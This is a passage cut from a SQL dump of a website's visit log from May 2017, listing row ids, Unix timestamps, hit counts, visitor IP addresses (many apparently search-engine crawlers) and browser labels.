'164.132.161.58','other'),(112524,1495322192,1,1,0,0,'51.255.65.24','other'),(112525,1495322343,1,1,0,0,'51.255.71.121','other'),(112526,1495322424,1,0,1,0,'66.249.76.93',''),(112527,1495322429,1,0,1,0,'66.249.76.89',''),(112528,1495322955,1,1,0,0,'164.132.161.4','other'),(112529,1495323087,1,1,0,0,'51.255.65.50','other'),(112530,1495323147,1,1,0,0,'217.69.133.13','other'),(112531,1495323287,1,1,0,0,'51.255.65.44','other'),(112532,1495323335,1,1,0,0,'157.55.39.127','other'),(112533,1495323380,1,1,0,0,'217.69.133.70','other'),(112534,1495324043,1,0,1,0,'66.249.76.109',''),(112535,1495324209,1,1,0,0,'66.249.76.108','chrome'),(112536,1495324333,2,2,0,0,'66.249.76.89','chrome'),(112537,1495324589,1,1,0,0,'217.182.132.55','other'),(112538,1495325109,1,0,1,0,'66.249.76.91',''),(112539,1495325317,1,1,0,0,'217.182.132.28','other'),(112540,1495325379,1,1,0,0,'51.255.71.122','other'),(112541,1495326418,1,1,0,0,'164.132.161.3','other'),(112542,1495326482,1,1,0,0,'8.29.198.25','other'),(112543,1495326512,1,1,0,0,'137.74.207.101','other'),(112544,1495326795,1,1,0,0,'217.69.133.67','other'),(112545,1495326940,1,1,0,0,'164.132.161.57','other'),(112546,1495327450,1,1,0,0,'217.69.133.223','other'),(112547,1495327863,1,1,0,0,'164.132.161.22','other'),(112548,1495328101,1,1,0,0,'217.69.133.215','other'),(112549,1495328151,1,1,0,0,'217.182.132.34','other'),(112550,1495328222,1,1,0,0,'66.249.76.91','chrome'),(112551,1495328488,2,0,2,0,'66.249.76.93',''),(112552,1495328721,1,1,0,0,'217.182.132.61','other'),(112553,1495328897,1,1,0,0,'180.76.15.34','other'),(112554,1495329130,1,1,0,0,'5.255.253.28','other'),(112555,1495329545,1,1,0,0,'217.182.132.16','other'),(112556,1495330114,1,1,0,0,'51.255.65.39','other'),(112557,1495330239,1,1,0,0,'164.132.161.94','other'),(112558,1495330909,1,1,0,0,'217.69.136.210','other'),(112559,1495331605,1,1,0,0,'217.182.132.23','other'),(112560,1495331675,1,1,0,0,'51.255.65.65','other'),(112561,1495332005,1,0,1,0,'68.180.231.23',''),(112562,1495332014,1,1,0,0,'51.255.65.60','other'),(112563,1495332486,1,1,0,0,'51.255.65.224','other'),(112564,1495332632,1,1,0,0,'217.182.132.186','other'),(112565,1495332759,1,1,0,0,'137.74.207.161','other'),(112566,1495332912,1,0,1,0,'66.249.66.81',''),(112567,1495333120,1,1,0,0,'51.255.71.127','other'),(112568,1495333126,1,1,0,0,'51.255.65.30','other'),(112569,1495333274,1,1,0,0,'164.132.161.96','other'),(112570,1495333520,1,1,0,0,'217.182.132.74','other'),(112571,1495333952,1,1,0,0,'217.182.132.241','other'),(112572,1495334023,1,1,0,0,'51.255.71.127','other'),(112573,1495334231,1,1,0,0,'137.74.207.110','other'),(112574,1495334334,1,1,0,0,'217.69.133.192','other'),(112575,1495334500,1,1,0,0,'217.182.132.171','other'),(112576,1495334533,1,1,0,0,'95.24.25.5','msie'),(112577,1495334811,1,1,0,0,'51.255.71.123','other'),(112578,1495334871,1,1,0,0,'217.69.133.193','other'),(112579,1495335671,1,1,0,0,'164.132.161.47','other'),(112580,1495335809,1,1,0,0,'51.255.71.113','other'),(112581,1495335887,1,1,0,0,'164.132.161.5','other'),(112582,1495335964,1,1,0,0,'217.69.133.229','other'),(112583,1495336242,1,1,0,0,'217.69.136.209','other'),(112584,1495336264,1,1,0,0,'51.255.65.21','other'),(112585,1495336544,1,1,0,0,'66.249.76.91','chrome'),(112586,1495336717,1,1,0,0,'51.255.65.42','other'),(112587,1495336742,1,0,1,0,'66.249.76.93',''),(112588,1495336756,1,1,0,0,'164.132.161.3','other'),(112589,1495336774,1,1,0,0,'66.249.66.183','chrome'),(112590,1495337311,1,1,0,0,'8.29.198.26','other'),(112591,1495337562,1,1,0,0,'217.182.132.81','other'),(112592,1495337871,1,1,0,0,'164.132.161.72','other'),(112593,1495338387,1,1,0,0,'217.69.133.224','other'),(112594,1495338687,1,1,0,0,'164.132.161.59','other'),(112595,1495339053,1,0,1,0,'66.249.66.177',''),(112596,1495339718,1,1,0,0,'137.74.207.102','other'),(112597,1495339762,1,0,1,0,'68.180.230.48',''),(112598,1495339788,1,1,0,0,'51.255.65.79','other'),(112599,1495340062,1,1,0,0,'164.132.161.30','other'),(112600,1495340100,1,1,0,0,'217.69.133.72','other'),(112601,1495340130,1,1,0,0,'164.132.161.5','other'),(112602,1495340243,1,1,0,0,'51.255.65.72','other'),(112603,1495341514,1,0,1,0,'66.249.76.107',''),(112604,1495341626,1,1,0,0,'217.182.132.176','other'),(112605,1495341713,1,0,1,0,'66.249.66.87',''),(112606,1495342097,1,1,0,0,'157.55.39.142','other'),(112607,1495342251,1,1,0,0,'51.255.65.32','other'),(112608,1495342946,1,1,0,0,'164.132.161.75','other'),(112609,1495343123,1,1,0,0,'51.255.71.129','other'),(112610,1495343879,2,2,0,0,'217.182.132.5','other'),(112611,1495343942,1,1,0,0,'217.69.133.240','other'),(112612,1495344060,1,1,0,0,'217.69.133.9','other'),(112613,1495345098,1,1,0,0,'217.182.132.150','other'),(112614,1495345372,1,1,0,0,'51.255.65.55','other'),(112615,1495345472,1,1,0,0,'137.74.207.119','other'),(112616,1495345509,1,1,0,0,'51.255.65.12','other'),(112617,1495345721,1,0,1,0,'66.249.66.87',''),(112618,1495345722,1,0,1,0,'66.249.66.81',''),(112619,1495345989,1,1,0,0,'217.182.132.61','other'),(112620,1495346035,1,1,0,0,'217.69.133.28','other'),(112621,1495346036,1,1,0,0,'217.69.133.60','other'),(112622,1495346183,1,0,1,0,'66.249.76.91',''),(112623,1495347032,3,3,0,0,'173.212.226.214','other'),(112624,1495347656,1,1,0,0,'217.69.133.239','other'),(112625,1495347779,1,1,0,0,'217.182.132.178','other'),(112626,1495348078,1,1,0,0,'217.182.132.90','other'),(112627,1495348131,1,0,1,0,'66.249.76.107',''),(112628,1495348138,1,1,0,0,'8.29.198.27','other'),(112629,1495348497,1,0,1,0,'66.249.66.81',''),(112630,1495348586,1,1,0,0,'164.132.161.14','other'),(112631,1495348965,1,1,0,0,'66.102.9.29','chrome'),(112632,1495348980,1,1,0,0,'51.255.65.89','other'),(112633,1495349290,1,1,0,0,'217.182.132.16','other'),(112634,1495349639,1,1,0,0,'137.74.207.114','other'),(112635,1495349799,1,1,0,0,'185.80.220.42','chrome'),(112636,1495350051,1,1,0,0,'217.69.133.216','other'),(112637,1495350274,1,1,0,0,'164.132.161.61','other'),(112638,1495350793,1,0,1,0,'66.249.66.84',''),(112639,1495350876,1,1,0,0,'66.249.76.109','chrome'),(112640,1495350925,1,1,0,0,'46.48.13.161','chrome'),(112641,1495350992,1,0,1,0,'66.249.66.87',''),(112642,1495351158,1,1,0,0,'51.255.65.21','other'),(112643,1495351302,1,1,0,0,'66.249.66.84','chrome'),(112644,1495351598,1,1,0,0,'185.80.220.42','chrome'),(112645,1495351810,1,1,0,0,'164.132.161.2','other'),(112646,1495351921,1,1,0,0,'217.69.133.251','other'),(112647,1495351965,1,1,0,0,'164.132.161.22','other'),(112648,1495352015,1,1,0,0,'137.74.207.102','other'),(112649,1495352318,1,1,0,0,'217.182.132.73','other'),(112650,1495352471,1,1,0,0,'51.255.65.23','other'),(112651,1495352824,1,1,0,0,'51.255.71.122','other'),(112652,1495352911,1,1,0,0,'164.132.161.6','other'),(112653,1495353339,2,2,0,0,'51.255.65.52','other'),(112654,1495353571,3,3,0,0,'91.209.11.236','other'),(112655,1495354315,1,1,0,0,'217.69.133.218','other'),(112656,1495354385,1,1,0,0,'217.69.133.228','other'),(112657,1495354448,1,1,0,0,'217.182.132.240','other'),(112658,1495354515,1,1,0,0,'157.55.39.135','other'),(112659,1495354862,1,1,0,0,'40.77.167.95','other'),(112660,1495355072,1,1,0,0,'164.132.161.17','other'),(112661,1495355188,1,1,0,0,'137.74.207.188','other'),(112662,1495355568,2,2,0,0,'162.210.196.98','other'),(112663,1495355607,1,1,0,0,'180.76.15.6','other'),(112664,1495355629,1,1,0,0,'180.76.15.138','other'),(112665,1495356345,1,1,0,0,'151.80.27.116','other'),(112666,1495356508,1,0,1,0,'66.249.66.84',''),(112667,1495356736,1,1,0,0,'157.55.39.135','other'),(112668,1495357250,1,1,0,0,'137.74.207.161','other'),(112669,1495357633,1,1,0,0,'217.69.133.28','other'),(112670,1495358005,1,1,0,0,'51.255.71.125','other'),(112671,1495358020,1,0,1,0,'66.249.76.89',''),(112672,1495358053,1,1,0,0,'164.132.162.187','other'),(112673,1495358420,1,1,0,0,'51.255.65.79','other'),(112674,1495358716,1,1,0,0,'95.132.68.23','chrome'),(112675,1495358843,1,1,0,0,'217.182.132.34','other'),(112676,1495358966,1,1,0,0,'8.29.198.27','other'),(112677,1495358977,1,1,0,0,'37.112.226.127','msie'),(112678,1495359003,1,1,0,0,'40.77.167.95','other'),(112679,1495359068,1,1,0,0,'51.255.65.91','other'),(112680,1495359139,7,7,0,0,'23.254.166.135','other'),(112681,1495359231,1,1,0,0,'91.196.178.161','chrome'),(112682,1495359496,1,1,0,0,'51.255.71.130','other'),(112683,1495359497,1,1,0,0,'51.255.65.32','other'),(112684,1495359588,1,1,0,0,'217.69.133.248','other'),(112685,1495359788,1,0,1,0,'66.249.76.107',''),(112686,1495359818,1,1,0,0,'217.69.133.227','other'),(112687,1495360005,1,1,0,0,'164.132.161.79','other'),(112688,1495360052,1,1,0,0,'51.255.71.120','other'),(112689,1495360443,1,1,0,0,'37.55.152.71','chrome'),(112690,1495360639,1,1,0,0,'217.182.132.156','other'),(112691,1495360922,1,1,0,0,'164.132.161.65','other'),(112692,1495361181,1,1,0,0,'164.132.161.69','other'),(112693,1495361726,1,1,0,0,'164.132.161.34','other'),(112694,1495362080,1,1,0,0,'217.182.132.147','other'),(112695,1495362452,1,1,0,0,'217.182.132.37','other'),(112696,1495362793,1,1,0,0,'217.182.132.240','other'),(112697,1495362806,1,0,1,0,'66.249.76.108',''),(112698,1495362855,1,1,0,0,'141.8.142.164','other'),(112699,1495362864,1,1,0,0,'141.8.142.97','other'),(112700,1495362885,1,1,0,0,'5.255.253.58','other'),(112701,1495362921,1,1,0,0,'141.8.142.17','other'),(112702,1495363115,1,1,0,0,'178.154.189.29','other'),(112703,1495363367,1,1,0,0,'217.182.132.81','other'),(112704,1495363419,1,1,0,0,'93.158.152.79','other'),(112705,1495363543,1,1,0,0,'164.132.161.83','other'),(112706,1495364118,1,1,0,0,'217.69.133.28','other'),(112707,1495364912,1,1,0,0,'164.132.162.187','other'),(112708,1495364960,1,0,1,0,'66.249.76.91',''),(112709,1495365115,1,1,0,0,'164.132.161.53','other'),(112710,1495365167,1,1,0,0,'164.132.161.75','other'),(112711,1495365240,1,1,0,0,'51.255.65.224','other'),(112712,1495365288,1,1,0,0,'51.255.65.59','other'),(112713,1495365361,1,1,0,0,'217.69.133.232','other'),(112714,1495365362,1,1,0,0,'217.69.133.227','other'),(112715,1495365944,3,3,0,0,'91.209.11.236','other'),(112716,1495366371,1,1,0,0,'217.69.136.207','other'),(112717,1495366696,1,1,0,0,'66.249.76.109','chrome'),(112718,1495366885,1,1,0,0,'164.132.161.24','other'),(112719,1495366948,1,0,1,0,'66.249.66.87',''),(112720,1495366970,1,0,1,0,'66.249.66.81',''),(112721,1495366975,1,0,1,0,'66.249.76.89',''),(112722,1495367059,1,1,0,0,'217.182.132.33','other'),(112723,1495367120,1,1,0,0,'91.196.178.70','chrome'),(112724,1495367426,1,1,0,0,'51.255.65.4','other'),(112725,1495367823,1,1,0,0,'40.77.167.95','other'),(112726,1495367933,2,2,0,0,'95.108.213.34','other'),(112727,1495367943,1,1,0,0,'164.132.161.36','other'),(112728,1495367945,1,1,0,0,'141.8.142.154','other'),(112729,1495367954,2,2,0,0,'141.8.142.15','other'),(112730,1495367961,1,1,0,0,'95.108.179.15','other'),(112731,1495368108,1,1,0,0,'164.132.162.158','other'),(112732,1495368110,1,0,1,0,'66.249.66.180',''),(112733,1495368137,1,1,0,0,'217.69.133.2','other'),(112734,1495368146,2,2,0,0,'217.182.132.172','other'),(112735,1495368196,1,1,0,0,'217.69.133.85','other'),(112736,1495368819,1,1,0,0,'51.255.65.19','other'),(112737,1495368848,1,1,0,0,'51.255.65.55','other'),(112738,1495368986,1,1,0,0,'164.132.161.8','other'),(112739,1495369015,1,1,0,0,'217.69.133.29','other'),(112740,1495369167,1,1,0,0,'51.255.65.63','other'),(112741,1495369324,1,0,1,0,'66.249.66.87',''),(112742,1495369446,2,2,0,0,'91.209.11.236','other'),(112743,1495369618,1,1,0,0,'217.182.132.95','other'),(112744,1495369633,1,1,0,0,'51.255.65.17','other'),(112745,1495369700,1,1,0,0,'164.132.161.79','other'),(112746,1495369799,1,1,0,0,'8.29.198.26','other'),(112747,1495369832,1,0,1,0,'66.249.66.180',''),(112748,1495369861,1,1,0,0,'66.249.76.93','chrome'),(112749,1495369922,1,1,0,0,'66.249.76.109','chrome'),(112750,1495369957,1,1,0,0,'217.182.132.191','other'),(112751,1495369985,1,1,0,0,'51.255.65.86','other'),(112752,1495370364,1,1,0,0,'217.182.132.58','other'),(112753,1495370624,1,1,0,0,'164.132.161.55','other'),(112754,1495370810,1,1,0,0,'217.69.133.234','other'),(112755,1495370981,1,1,0,0,'217.69.133.237','other'),(112756,1495370983,1,1,0,0,'217.69.133.70','other'),(112757,1495371238,1,0,1,0,'66.249.66.180',''),(112758,1495371421,1,1,0,0,'217.69.136.210','other'),(112759,1495371717,1,1,0,0,'51.255.65.33','other'),(112760,1495372248,1,1,0,0,'217.69.133.222','other'),(112761,1495372389,1,1,0,0,'51.255.65.30','other'),(112762,1495372477,1,1,0,0,'217.182.132.67','other'),(112763,1495372620,1,1,0,0,'217.69.133.251','other'),(112764,1495372892,1,1,0,0,'51.255.65.32','other'),(112765,1495373020,1,1,0,0,'217.182.132.15','other'),(112766,1495373028,1,1,0,0,'137.74.207.109','other'),(112767,1495374159,1,1,0,0,'164.132.162.158','other'),(112768,1495374243,1,0,1,0,'66.249.76.91',''),(112769,1495374413,1,1,0,0,'217.182.132.21','other'),(112770,1495374729,1,1,0,0,'157.55.39.152','other'),(112771,1495374987,1,1,0,0,'40.77.167.20','other'),(112772,1495375372,1,1,0,0,'66.249.66.180','chrome'),(112773,1495375722,1,1,0,0,'51.255.65.59','other'),(112774,1495375858,1,1,0,0,'217.69.133.10','other'),(112775,1495376228,1,1,0,0,'217.182.132.7','other'),(112776,1495376455,1,0,1,0,'66.249.76.91',''),(112777,1495376469,1,0,1,0,'66.249.76.89',''),(112778,1495376474,1,0,1,0,'66.249.66.81',''),(112779,1495376505,1,0,1,0,'66.249.66.180',''),(112780,1495376532,1,0,1,0,'66.249.76.109',''),(112781,1495376618,1,1,0,0,'217.182.132.27','other'),(112782,1495377407,1,1,0,0,'217.182.132.92','other'),(112783,1495377563,1,0,1,0,'66.249.66.84',''),(112784,1495377853,1,1,0,0,'217.69.133.226','other'),(112785,1495377957,1,1,0,0,'217.182.132.75','other'),(112786,1495378060,1,1,0,0,'51.255.65.86','other'),(112787,1495378425,1,1,0,0,'164.132.161.39','other'),(112788,1495378671,1,1,0,0,'164.132.162.153','other'),(112789,1495378847,1,1,0,0,'51.255.71.123','other'),(112790,1495379151,1,1,0,0,'217.69.133.18','other'),(112791,1495379319,1,1,0,0,'164.132.161.79','other'),(112792,1495379399,1,1,0,0,'217.182.132.171','other'),(112793,1495379591,1,1,0,0,'164.132.161.14','other'),(112794,1495379626,1,1,0,0,'164.132.161.10','other'),(112795,1495379701,1,0,1,0,'66.249.76.89',''),(112796,1495379773,1,0,1,0,'66.249.66.87',''),(112797,1495380284,1,0,1,0,'66.249.76.107',''),(112798,1495380353,1,1,0,0,'217.69.133.240','other'),(112799,1495380361,1,1,0,0,'51.255.71.101','other'),(112800,1495380635,1,1,0,0,'8.29.198.25','other'),(112801,1495381364,1,1,0,0,'51.255.71.114','other'),(112802,1495381399,1,1,0,0,'157.55.39.135','other'),(112803,1495381559,1,0,1,0,'66.249.76.89',''),(112804,1495381814,1,1,0,0,'94.231.176.249','chrome'),(112805,1495381838,1,1,0,0,'51.255.65.7','other'),(112806,1495381995,1,1,0,0,'164.132.162.164','other'),(112807,1495382027,1,1,0,0,'5.228.8.57','msie'),(112808,1495382440,1,1,0,0,'51.255.71.132','other'),(112809,1495382712,1,1,0,0,'164.132.161.84','other'),(112810,1495382856,1,0,1,0,'66.249.66.185',''),(112811,1495382909,1,1,0,0,'164.132.161.69','other'),(112812,1495383105,1,1,0,0,'217.69.136.210','other'),(112813,1495383178,1,1,0,0,'217.69.133.191','other'),(112814,1495383180,1,1,0,0,'217.69.133.23','other'),(112815,1495383382,1,1,0,0,'217.69.133.223','other'),(112816,1495383384,1,1,0,0,'164.132.162.164','other'),(112817,1495383443,1,1,0,0,'54.165.59.7','other'),(112818,1495383628,1,0,1,0,'66.249.76.91',''),(112819,1495383696,1,1,0,0,'46.151.80.200','other'),(112820,1495383930,1,1,0,0,'217.69.133.9','other'),(112821,1495384151,1,1,0,0,'217.182.132.30','other'),(112822,1495384337,1,1,0,0,'164.132.161.42','other'),(112823,1495384550,1,1,0,0,'217.182.132.16','other'),(112824,1495384757,1,0,1,0,'66.249.76.91',''),(112825,1495384837,1,1,0,0,'51.255.65.90','other'),(112826,1495384838,1,0,1,0,'66.249.76.109',''),(112827,1495384841,1,0,1,0,'66.249.76.108',''),(112828,1495384880,1,0,1,0,'66.249.66.210',''),(112829,1495385320,1,1,0,0,'164.132.161.85','other'),(112830,1495385359,1,1,0,0,'217.182.132.54','other'),(112831,1495385582,1,1,0,0,'51.255.65.95','other'),(112832,1495385774,1,1,0,0,'51.255.65.49','other'),(112833,1495385869,2,2,0,0,'91.209.11.236','other'),(112834,1495386050,1,1,0,0,'164.132.161.49','other'),(112835,1495386204,1,1,0,0,'51.255.71.115','other'),(112836,1495386362,1,1,0,0,'157.55.39.135','other'),(112837,1495386420,1,1,0,0,'51.255.65.50','other'),(112838,1495386552,1,1,0,0,'51.255.65.17','other'),(112839,1495386822,2,0,2,0,'66.249.66.188',''),(112840,1495387063,1,1,0,0,'51.255.65.79','other'),(112841,1495387490,1,1,0,0,'217.182.132.31','other'),(112842,1495387750,1,0,1,0,'66.249.76.109',''),(112843,1495387906,1,0,1,0,'66.249.76.93',''),(112844,1495388042,1,0,1,0,'66.249.76.91',''),(112845,1495388061,1,0,1,0,'66.249.76.107',''),(112846,1495388076,1,0,1,0,'66.249.66.182',''),(112847,1495388100,1,1,0,0,'217.182.132.68','other'),(112848,1495388130,1,1,0,0,'217.69.136.207','other'),(112849,1495388215,1,1,0,0,'217.69.133.238','other'),(112850,1495388625,1,1,0,0,'66.249.76.109','chrome'),(112851,1495389154,2,0,2,0,'66.249.66.197',''),(112852,1495389203,1,1,0,0,'217.69.133.250','other'),(112853,1495389205,1,0,1,0,'66.249.66.210',''),(112854,1495389797,1,1,0,0,'51.255.65.80','other'),(112855,1495389833,1,1,0,0,'51.255.65.77','other'),(112856,1495389893,1,1,0,0,'157.55.39.135','other'),(112857,1495390030,1,1,0,0,'51.255.65.79','other'),(112858,1495390346,1,0,1,0,'66.249.76.109',''),(112859,1495391001,1,1,0,0,'217.182.132.70','other'),(112860,1495391007,1,0,1,0,'66.249.66.210',''),(112861,1495391028,1,0,1,0,'66.249.76.108',''),(112862,1495391034,1,0,1,0,'66.249.66.185',''),(112863,1495391161,1,1,0,0,'51.255.65.78','other'),(112864,1495391178,1,1,0,0,'137.74.207.170','other'),(112865,1495391243,1,0,1,0,'66.249.76.93',''),(112866,1495391333,2,2,0,0,'54.165.59.7','other'),(112867,1495391472,1,1,0,0,'8.29.198.25','other'),(112868,1495391774,1,1,0,0,'164.132.161.97','other'),(112869,1495392141,1,0,1,0,'66.249.76.91',''),(112870,1495392251,1,1,0,0,'51.255.65.77','other'),(112871,1495392285,1,1,0,0,'51.255.65.96','other'),(112872,1495392498,1,1,0,0,'217.69.133.15','other'),(112873,1495392534,1,1,0,0,'164.132.161.35','other'),(112874,1495392863,3,3,0,0,'91.209.11.236','other'),(112875,1495392881,1,1,0,0,'51.255.71.101','other'),(112876,1495393555,1,1,0,0,'217.69.133.85','other'),(112877,1495393798,1,1,0,0,'217.182.132.74','other'),(112878,1495393816,1,1,0,0,'176.15.181.64','msie'),(112879,1495393818,1,1,0,0,'176.195.98.251','msie'),(112880,1495394600,1,1,0,0,'164.132.162.164','other'),(112881,1495394688,1,1,0,0,'217.182.132.55','other'),(112882,1495394758,1,1,0,0,'51.255.65.50','other'),(112883,1495394780,1,1,0,0,'217.182.132.50','other'),(112884,1495394890,1,1,0,0,'164.132.161.76','other'),(112885,1495394953,1,0,1,0,'66.249.76.107',''),(112886,1495395098,1,1,0,0,'164.132.161.4','other'),(112887,1495395233,1,1,0,0,'217.182.132.90','other'),(112888,1495395785,1,1,0,0,'217.182.132.95','other'),(112889,1495396113,1,1,0,0,'164.132.161.92','other'),(112890,1495396530,1,1,0,0,'91.196.178.133','chrome'),(112891,1495396531,1,1,0,0,'51.255.65.60','other'),(112892,1495396899,1,1,0,0,'164.132.161.90','other'),(112893,1495396938,1,0,1,0,'66.249.76.91',''),(112894,1495397249,1,1,0,0,'217.182.132.175','other'),(112895,1495397304,1,1,0,0,'51.255.65.71','other'),(112896,1495397538,1,1,0,0,'217.182.132.61','other'),(112897,1495397716,1,1,0,0,'217.182.132.241','other'),(112898,1495397964,1,1,0,0,'66.249.76.108','chrome'),(112899,1495398632,114,2,112,0,'142.54.174.130',''),(112900,1495398711,1,1,0,0,'217.69.133.235','other'),(112901,1495398947,1,1,0,0,'164.132.161.36','other'),(112902,1495398993,1,1,0,0,'217.182.132.61','other'),(112903,1495399097,1,1,0,0,'164.132.161.10','other'),(112904,1495399205,1,1,0,0,'40.77.167.95','other'),(112905,1495399462,1,1,0,0,'51.255.65.89','other'),(112906,1495399537,1,1,0,0,'51.255.65.44','other'),(112907,1495399550,32,0,32,0,'142.54.174.130',''),(112908,1495399611,1,1,0,0,'217.69.133.233','other'),(112909,1495399809,71,71,0,0,'142.54.174.130','msie'),(112910,1495400108,5,5,0,0,'142.54.174.130','firefox'),(112911,1495400118,1,1,0,0,'217.69.133.215','other'),(112912,1495400129,1,1,0,0,'217.69.133.23','other'),(112913,1495400153,1,1,0,0,'137.74.207.108','other'),(112914,1495400184,1,1,0,0,'51.255.65.65','other'),(112915,1495400317,1,1,0,0,'5.3.153.87','msie'),(112916,1495400533,1,1,0,0,'217.182.132.83','other'),(112917,1495400909,1,1,0,0,'157.55.39.152','other'),(112918,1495400930,1,1,0,0,'164.132.161.19','other'),(112919,1495400936,1,0,1,0,'66.249.76.91',''),(112920,1495401150,1,1,0,0,'141.8.132.72','other'),(112921,1495401191,1,1,0,0,'217.182.132.171','other'),(112922,1495401435,1,1,0,0,'180.76.15.146','other'),(112923,1495401931,1,0,1,0,'66.249.76.93',''),(112924,1495401935,3,0,3,0,'66.249.76.89',''),(112925,1495401961,1,0,1,0,'66.249.76.91',''),(112926,1495402047,1,1,0,0,'217.182.132.15','other'),(112927,1495402114,1,1,0,0,'95.28.227.114','msie'),(112928,1495402175,1,1,0,0,'66.249.76.107','chrome'),(112929,1495402306,1,1,0,0,'8.29.198.26','other'),(112930,1495402371,1,1,0,0,'51.255.65.39','other'),(112931,1495402386,1,1,0,0,'217.182.132.52','other'),(112932,1495402828,1,0,1,0,'66.249.66.188',''),(112933,1495403321,1,1,0,0,'66.249.76.93','chrome'),(112934,1495403372,1,1,0,0,'176.193.106.59','msie'),(112935,1495403560,1,1,0,0,'164.132.161.52','other'),(112936,1495403710,1,1,0,0,'51.255.65.34','other'),(112937,1495404754,1,1,0,0,'217.69.133.215','other'),(112938,1495404818,1,1,0,0,'217.182.132.153','other'),(112939,1495404931,1,1,0,0,'217.182.132.59','other'),(112940,1495404942,1,1,0,0,'37.204.154.238','msie'),(112941,1495405248,1,1,0,0,'51.255.65.30','other'),(112942,1495405285,1,1,0,0,'40.77.167.95','other'),(112943,1495405310,1,1,0,0,'46.242.76.106','msie'),(112944,1495405347,1,0,1,0,'66.249.76.91',''),(112945,1495405565,1,1,0,0,'51.255.65.83','other'),(112946,1495405690,1,1,0,0,'164.132.161.17','other'),(112947,1495405775,1,1,0,0,'51.255.65.7','other'),(112948,1495405800,1,1,0,0,'217.69.133.226','other'),(112949,1495406499,1,1,0,0,'164.132.161.91','other'),(112950,1495406562,1,0,1,0,'68.180.230.48',''),(112951,1495406643,1,1,0,0,'217.69.133.241','other'),(112952,1495407052,1,1,0,0,'164.132.161.29','other'),(112953,1495407110,1,1,0,0,'164.132.161.14','other'),(112954,1495407547,1,1,0,0,'164.132.161.58','other'),(112955,1495407641,1,1,0,0,'51.255.71.127','other'),(112956,1495408008,1,1,0,0,'217.182.132.31','other'),(112957,1495408192,1,1,0,0,'37.112.226.127','msie'),(112958,1495408252,1,0,1,0,'66.249.76.91',''),(112959,1495408633,1,1,0,0,'51.255.65.62','other'),(112960,1495409421,1,0,1,0,'66.249.66.210',''),(112961,1495409537,1,1,0,0,'207.46.13.169','other'),(112962,1495409811,1,0,1,0,'66.249.66.185',''),(112963,1495409986,1,1,0,0,'51.255.65.62','other'),(112964,1495410000,1,1,0,0,'137.74.207.159','other'),(112965,1495410025,1,1,0,0,'164.132.161.12','other'),(112966,1495410699,1,0,1,0,'66.249.76.109',''),(112967,1495410841,1,1,0,0,'217.69.133.68','other'),(112968,1495410954,1,1,0,0,'217.69.133.14','other'),(112969,1495410973,1,1,0,0,'217.182.132.62','other'),(112970,1495411201,1,1,0,0,'164.132.161.27','other'),(112971,1495411743,2,2,0,0,'95.213.141.126','opera'),(112972,1495412158,1,1,0,0,'157.55.39.152','other'),(112973,1495412304,1,1,0,0,'217.182.132.28','other'),(112974,1495412442,1,1,0,0,'217.69.133.203','other'),(112975,1495412797,1,1,0,0,'217.69.133.29','other'),(112976,1495413090,1,0,1,0,'68.180.230.48',''),(112977,1495413095,1,1,0,0,'217.182.132.22','other'),(112978,1495413133,1,1,0,0,'8.29.198.26','other'),(112979,1495413179,1,1,0,0,'66.249.66.210','chrome'),(112980,1495413191,1,1,0,0,'66.249.76.108','chrome'),(112981,1495413294,2,0,2,0,'66.249.76.93',''),(112982,1495413436,1,0,1,0,'66.249.66.197',''),(112983,1495413580,1,1,0,0,'51.255.65.97','other'),(112984,1495414103,1,1,0,0,'207.46.13.169','other'),(112985,1495414105,14,14,0,0,'208.43.225.85','other'),(112986,1495414144,11,11,0,0,'208.43.225.84','other'),(112987,1495414346,1,1,0,0,'164.132.161.79','other'),(112988,1495414921,1,1,0,0,'164.132.161.28','other'),(112989,1495414953,1,1,0,0,'51.255.65.69','other'),(112990,1495414979,1,1,0,0,'51.255.65.55','other'),(112991,1495415382,1,1,0,0,'164.132.162.188','other'),(112992,1495415429,1,1,0,0,'51.255.65.75','other'),(112993,1495415436,1,0,1,0,'66.249.66.182',''),(112994,1495415624,1,1,0,0,'217.69.133.234','other'),(112995,1495415733,1,1,0,0,'164.132.161.40','other'),(112996,1495416073,1,1,0,0,'164.132.161.9','other'),(112997,1495416562,1,1,0,0,'164.132.161.42','other'),(112998,1495416808,1,1,0,0,'217.69.133.203','other'),(112999,1495416961,1,1,0,0,'164.132.161.52','other'),(113000,1495417153,1,1,0,0,'217.69.133.10','other'),(113001,1495417441,1,1,0,0,'51.255.65.31','other'),(113002,1495417483,1,0,1,0,'66.249.76.107',''),(113003,1495417527,1,0,1,0,'66.249.76.89',''),(113004,1495417537,1,0,1,0,'66.249.76.91',''),(113005,1495417547,1,1,0,0,'217.182.132.55','other'),(113006,1495417609,1,1,0,0,'216.244.66.237','other'),(113007,1495417873,1,1,0,0,'51.255.65.86','other'),(113008,1495417903,1,1,0,0,'217.182.132.86','other'),(113009,1495417963,1,1,0,0,'5.165.249.218','msie'),(113010,1495418152,1,1,0,0,'51.255.71.125','other'),(113011,1495418185,1,1,0,0,'164.132.161.30','other'),(113012,1495418403,1,1,0,0,'164.132.161.7','other'),(113013,1495418588,1,1,0,0,'217.182.132.50','other'),(113014,1495418598,1,1,0,0,'217.182.132.90','other'),(113015,1495418745,1,0,1,0,'66.249.76.107',''),(113016,1495418809,2,0,2,0,'66.249.76.89',''),(113017,1495418812,2,0,2,0,'66.249.76.93',''),(113018,1495418830,1,0,1,0,'66.249.66.182',''),(113019,1495419159,1,1,0,0,'217.182.132.155','other'),(113020,1495419218,1,1,0,0,'176.31.231.10','other'),(113021,1495419382,1,1,0,0,'176.193.104.87','msie'),(113022,1495419415,1,1,0,0,'217.69.133.59','other'),(113023,1495419503,1,0,1,0,'66.249.76.108',''),(113024,1495419901,1,1,0,0,'37.112.37.79','msie'),(113025,1495420252,1,0,1,0,'66.249.76.109',''),(113026,1495420561,1,0,1,0,'66.249.66.182',''),(113027,1495420562,1,0,1,0,'66.249.76.93',''),(113028,1495420606,1,0,1,0,'68.180.231.23',''),(113029,1495420624,1,1,0,0,'51.255.65.44','other'),(113030,1495421141,1,1,0,0,'217.182.132.191','other'),(113031,1495421270,1,1,0,0,'217.182.132.240','other'),(113032,1495421373,1,1,0,0,'176.31.231.10','other'),(113033,1495421510,1,1,0,0,'51.255.65.55','other'),(113034,1495421672,1,0,1,0,'68.180.230.48',''),(113035,1495421682,1,1,0,0,'217.182.132.149','other'),(113036,1495421743,1,1,0,0,'51.255.65.68','other'),(113037,1495422071,1,1,0,0,'217.69.136.203','other'),(113038,1495422103,1,1,0,0,'164.132.161.89','other'),(113039,1495422218,1,1,0,0,'95.108.213.34','other'),(113040,1495422361,1,1,0,0,'157.55.39.152','other'),(113041,1495422627,1,0,1,0,